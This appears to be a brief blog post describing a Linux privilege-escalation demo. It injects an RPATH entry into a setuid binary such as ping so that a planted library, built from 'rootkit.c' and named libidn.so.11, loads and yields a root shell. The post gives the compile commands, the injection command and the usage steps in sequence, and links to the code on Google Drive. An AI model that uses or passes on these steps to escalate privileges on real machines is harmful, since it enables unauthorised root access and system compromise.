https://drive.google.com/file/d/0B1UY25xXM3UkbWtiM0FSdkRwQnM/view?usp=sharing
* Overview
This code is to demo how to insert our libary path into ELF's DT_PATH, then we can call our libary when the binary is executed.
* Compile
1) hack_RPATH64.c
Use this tool to add RPATH in elf binary.
make hack_RPATH64
2) rootkit.c
This libary can be put in current directly, referred by DT_NEEDED and forged "RPATH".
gcc -shared rootkit.c -o libidn.so.11 -fPIC
* Usage:
1) get root bash
- Copy binary with setuid bit to /home/passion/DT_RPATH, for example: ping
- Add RPATH entry into ./ping
cd /home/passion;
./hack_RPATH64 ./ping
readelf -d ./ping
- Check ./ping is owned by root, and with "setuid" bit
2) login through "passion"
- ./ping # get root shell.
No comments:
Post a Comment